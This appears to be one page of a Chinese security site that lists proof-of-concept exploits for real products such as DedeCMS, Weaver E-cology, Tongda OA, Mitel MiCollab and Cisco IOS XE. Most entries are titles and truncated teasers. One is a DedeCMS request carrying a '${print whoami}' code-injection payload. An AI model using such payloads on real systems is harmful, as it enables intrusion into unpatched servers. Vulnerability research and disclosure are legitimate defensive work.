POC 第5页
山石网科云鉴存在前台任意命令执行漏洞_秃兔安全

山石网科云鉴存在前台任意命令执行漏洞

import requests”’HSVD-2023-0008”’def setSystemTimeAction(newcsrf,headers): 登录可见余下内容
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
011915
【通用】金华迪加现场大屏互动系统 qiandao SQL注入_秃兔安全
DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞_秃兔安全

DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞

GET /dede/sys_verifies.php?action=getfiles&refiles[]=123${${print%20whoami}} HTTP/1.1Host: 127.0.0.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100...
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
014015
通达OAV11.10接口login.php存在SQL注入漏洞_秃兔安全
【通用】CVE-2025-32101 UNACMS rce_秃兔安全

【通用】CVE-2025-32101 UNACMS rce

fofa语句官方yaml   
dreamer292的头像_秃兔安全至尊玉兔dreamer29210个月前
013915
【通用】普华CMS GetFilesData sqli_秃兔安全

【通用】普华CMS GetFilesData sqli

fofa语句yakit 插件 uuidpocyaml懒得验证  
dreamer292的头像_秃兔安全至尊玉兔dreamer2927个月前
05415
泛微E-cology9 browserjsp SQL注入漏洞_秃兔安全

泛微E-cology9 browserjsp SQL注入漏洞

import argparseimport requestsfrom termcolor import coloredimport signal requests.packages.urllib3.disable_warnings()output_file = None def check_url(url, output=None):headers = {...
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
010315
【通用】Vacron NVR-board RCE_秃兔安全

【通用】Vacron NVR-board RCE

fofa语句yakit插件 uuidpocyaml已验证  
dreamer292的头像_秃兔安全至尊玉兔dreamer2927个月前
08315
【通用】 MitelMiCollab 身份绕过导致任意文件读取 CVE-2024-41713_秃兔安全

【通用】 MitelMiCollab 身份绕过导致任意文件读取 CVE-2024-41713

fofa语句yakit插件 uuidpocyakit yamlnuclei yaml已验证    
【通用】Cisco IOS XE WLC 任意文件上传(CVE-2025-20188)_秃兔安全